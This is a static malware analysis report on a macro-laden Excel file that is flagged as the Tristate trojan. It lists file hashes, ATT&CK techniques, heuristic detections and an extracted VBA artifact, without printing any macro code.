Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb120a7004b7017a…

MALICIOUS

Office (OLE)

31.5 KB Created: 1999-11-09 08:26:52 Authoring application: Microsoft Excel
MD5: 04b97db45edf9579aaa0cef3e3a47df7 SHA-1: c9e58481a8d4f4ff0da8090e703ea66d547fdb45 SHA-256: eb120a7004b7017a235e83b70ebc9885f2fda3222112763d222df73ad2802d19
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The file is an Excel spreadsheet containing VBA macros, as indicated by multiple heuristic firings including OLE_VBA_MACROS, OLE_VBA_CREATEOBJ, and OLE_VBA_GETOBJ. ClamAV detections identify the file as Win.Trojan.Tristate-2 and an extracted artifact as Doc.Trojan.Tristate-1. The document body contains financial planning text, suggesting a lure to trick users into enabling macros. No scripts were directly extracted or reconstructed, but the presence of macros and the ClamAV detections strongly suggest the execution of malicious code.

Heuristics 6

  • ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Tristate-2
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
ab6d1cf8ac5d295463a7a0554c30b621ce12536980700faa5357edd9c34b657a		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 9805 bytes
Detection
ClamAV: Doc.Trojan.Tristate-1
Obfuscation or payload: likely
Carved artifact contains 12 Chr/ChrW string-construction calls. Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.